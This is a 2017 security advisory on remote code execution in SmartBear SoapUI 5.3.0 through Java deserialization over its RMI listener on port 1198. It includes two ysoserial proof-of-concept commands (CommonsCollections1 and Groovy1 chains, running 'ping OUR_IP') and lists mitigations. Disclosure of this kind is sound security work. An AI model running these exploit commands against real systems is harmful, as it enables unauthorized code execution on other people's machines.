SmartBear SoapUI 5.3.0 Remote Code Execution Via Deserialization

`Title: SmartBear SoapUI - Remote Code Execution via Deserialization  
Author: Jakub Palaczynski  
Date: 12. July 2017  
  
Exploit tested on:  
==================  
SoapUI 5.3.0  
Also works on older versions.  
  
Vulnerability:  
**************  
  
Remote Code Execution via Deserialization:  
=================================  
  
SoapUI by default listens on all interfaces on TCP port 1198 where you  
can find SoapUI Integration (RMI) instance. SoapUI uses vulnerable  
Java libraries (commons-collections-3.2.1.jar and  
groovy-all-2.1.7.jar) which can be used to remotly execute commands  
with permissions of user that started SoapUI.  
  
Entry point:  
Java RMI Registry on TCP port 1198  
Vulnerable libraries used - commons-collections-3.2.1.jar and  
groovy-all-2.1.7.jar  
  
Proof of Concept:  
Sample PoC using Commons Collections vulnerable library:  
java -cp ysoserial-0.0.5-SNAPSHOT.jar  
ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198  
CommonsCollections1 'ping OUR_IP'  
Sample PoC using Groovy vulnerable library:  
java -cp ysoserial-0.0.5-SNAPSHOT.jar  
ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 Groovy1 'ping  
OUR_IP'  
  
Mitigations:  
- bind SoapUI Integration instance to localhost if possible  
- update all Java libraries that are known to be vulnerable:  
commons-collections-3.2.1.jar  
groovy-all-2.1.7.jar  
  
Contact:  
========  
Jakub[dot]Palaczynski[at]gmail[dot]com  
  
  
`